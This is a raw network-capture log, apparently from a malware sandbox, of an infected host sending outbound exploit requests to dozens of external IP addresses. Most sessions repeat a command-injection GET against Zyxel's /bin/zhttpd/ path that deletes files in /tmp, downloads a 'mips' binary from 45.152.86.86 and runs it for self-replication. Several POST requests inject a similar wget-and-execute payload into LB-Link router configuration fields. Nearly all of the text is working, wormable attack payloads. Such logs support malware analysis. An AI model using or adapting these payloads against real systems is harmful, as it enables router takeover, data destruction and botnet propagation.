                                        Mar 31, 2024 09:21:18.888643980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4607192.168.2.233423818.252.252.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.888684034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4608192.168.2.2352694153.166.205.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.888770103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4609192.168.2.234601466.227.144.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.888818979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4610192.168.2.2358690211.170.17.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.888850927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4611192.168.2.2349372219.96.169.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.888904095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4612192.168.2.2355986222.189.14.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.888997078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4613192.168.2.2357406104.232.78.618080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:19.845837116 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:21:23.984026909 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:21:30.127235889 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:21:42.157481909 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:07.497910023 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:56.643131971 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4614192.168.2.2344308141.63.119.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.897579908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4615192.168.2.234184858.173.240.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.897701979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4616192.168.2.2359276165.143.78.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.901664972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4617192.168.2.234577271.166.215.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.901689053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4618192.168.2.2357506114.118.75.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.904591084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4619192.168.2.2350180219.153.225.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.904623032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4620192.168.2.2359498222.198.60.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.904700041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4621192.168.2.233642844.174.187.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.904752970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4622192.168.2.233880852.162.197.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.904804945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4623192.168.2.234689836.40.19.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.904834986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4624192.168.2.235273099.0.198.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.904881001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4625192.168.2.2353678219.133.167.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.904932022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4626192.168.2.2359982149.213.112.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.904966116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4627192.168.2.2349050223.95.100.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.905011892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4628192.168.2.233790637.127.138.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.905073881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4629192.168.2.2335252198.46.28.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.905122995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4630192.168.2.234072419.17.164.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.905163050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4631192.168.2.234454823.194.82.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.905203104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4632192.168.2.23605068.205.17.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.905242920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4633192.168.2.2343832221.43.87.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.905283928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4634192.168.2.2337670189.29.76.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.905328989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4635192.168.2.2333108174.11.77.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.905365944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4636192.168.2.2354908108.102.171.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.905399084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4637192.168.2.234354679.64.149.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.905428886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4638192.168.2.235198093.99.47.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.905457020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4639192.168.2.233950241.89.141.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.905520916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4640192.168.2.235722653.31.38.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.905563116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4641192.168.2.235828095.182.218.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.905608892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4642192.168.2.234633693.5.56.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.905663013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4643192.168.2.234710437.176.154.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.905688047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4644192.168.2.235167461.238.216.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.905744076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4645192.168.2.234968254.216.65.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.905797005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4646192.168.2.233699295.16.94.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.905833006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4647192.168.2.2345924102.183.80.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.905890942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4648192.168.2.2357216185.204.101.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.905926943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4649192.168.2.2344276169.41.13.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.905976057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4650192.168.2.2334142165.240.109.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.906012058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4651192.168.2.234855270.159.192.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.906064034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4652192.168.2.23565805.104.50.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.906110048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4653192.168.2.2351250163.116.69.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.906168938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4654192.168.2.2350312133.91.3.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.906229973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4655192.168.2.2349870150.66.232.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.906275034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4656192.168.2.2347182129.178.83.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.906333923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4657192.168.2.2352368179.54.121.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.906384945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4658192.168.2.2333548180.252.57.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.906440020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4659192.168.2.2344824101.104.117.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.906476974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4660192.168.2.234657484.17.111.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.906519890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4661192.168.2.2347848145.143.114.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.906555891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4662192.168.2.234195213.114.148.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.906610966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4663192.168.2.2335064209.120.240.215443
                                        TimestampBytes transferredDirectionData
